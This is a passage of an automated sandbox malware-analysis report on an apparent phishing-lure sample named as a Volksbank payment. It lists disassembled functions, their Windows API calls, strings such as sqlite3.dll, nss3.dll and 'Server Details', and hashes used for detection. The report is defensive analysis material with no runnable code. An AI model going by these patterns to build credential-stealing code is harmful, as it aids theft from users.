                                                                                                                                                                                                                                          • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                                          • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                                          • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                                                                                                          Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                                                                                                                                                                          • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                                                          • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                                          • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                                                                                                                                                          • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                                                                                                          Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                                          • String ID: sqlite3.dll
                                                                                                                                                                                                                                          • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                                          • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                                                                                                                                          • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                                                                                                          Function 004073CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                                                                                                                                                          • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                                                                          • String ID: MZ@
                                                                                                                                                                                                                                          • API String ID: 1378638983-2978689999
                                                                                                                                                                                                                                          • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                                                                                                                                          • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                                                                                                                                                          Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfileString
                                                                                                                                                                                                                                          • String ID: A4@$Server Details
                                                                                                                                                                                                                                          • API String ID: 1096422788-4071850762
                                                                                                                                                                                                                                          • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                                          • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                                                                          Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                                                          • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                                          • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                                                                          Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,7611E430,?,00000000), ref: 0040858F
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,7611E430,?,00000000), ref: 004085BA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3110682361-0
                                                                                                                                                                                                                                          • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                                                                                                          • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                                                                          Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3510742995-0
                                                                                                                                                                                                                                          • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                                          • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                                                                          Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                                                          • Opcode ID: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                                                                                                                                                                          • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                                                                          Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040799A
                                                                                                                                                                                                                                            • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                            • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,76940A60,00407A43,00000001,?,00000000,76940A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                            • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                          • free.MSVCRT ref: 004079BD
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3669619086-0
                                                                                                                                                                                                                                          • Opcode ID: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                                                                                          • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59